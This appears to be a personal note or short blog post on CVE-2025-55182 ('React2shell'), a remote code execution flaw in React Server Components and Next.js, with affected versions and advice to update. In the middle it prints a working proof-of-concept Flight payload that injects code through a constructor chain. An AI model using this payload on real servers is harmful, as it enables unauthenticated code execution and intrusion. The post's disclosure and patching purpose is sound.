ID: I202512092151 Status: idea Tags: Security, Exploit, React Server Components, React, CVE, vulnerability

React2shell CVE-2025-55182

Tweet

The full exploit is better described in this tweet

It is an exploit with React Server Components. It effects React and NextJs. Make sure you are updated to the newest version of both of these. It doesn’t matter if you use the server components, if it is installed, it is vulnerable.

Versions

A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.

Most impotently, look at the react blogpost to see the versions of NextJs and other things you need to update.

how it works

The react team built their own protocol called “Flight”. This allows you to update the page by inserting a promise into the content that you want to show. (oversimplified explanation) You can read more about the flight protocol / React Server Components on this article. Or you can view theo’s explenation video (form 4:35 to 14:00) Now, this protocol is not a bad thing, It can be used for a lot of good thing.

But this protocol can be abused. With the below payload you could execute anything on the server, which in this case, is a console.log:

{
    '0': '$1',
    '1': {
        'status':'resolved_model',
        'reason':0,
        '_response':'$4',
        'value':'{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        'then':'$2:then'
    },
    '2': '$@3',
    '3': [],
    '4': {
        '_prefix':'console.log(7*7+1)//',
        '_formData':{
            'get':'$3:constructor:constructor'
        },
        '_chunks':'$2:_response:_chunks',
    }
}

This exploit was found by lachlan2k and you can read more about how to reproduce to check your repo’s in his repo.

I am affected, what now

I am of not much help here since I am writing this whilst sleep deprived, at midnight. But I suggest you google.

I do have somewhere to point you to though, this person on twitter was also affected. He explains a lot in his tweet: https://x.com/duborges/status/1997293892090183772.

More notes

• on December 5th, cloudflare went down because they tried to fix this (for 30m).

---

References

https://www.cve.org/CVERecord?id=CVE-2025-55182

https://www.youtube.com/watch?v=UiCEejcV5N4

https://x.com/rauchg/status/1997362942929440937

https://x.com/duborges/status/1997293892090183772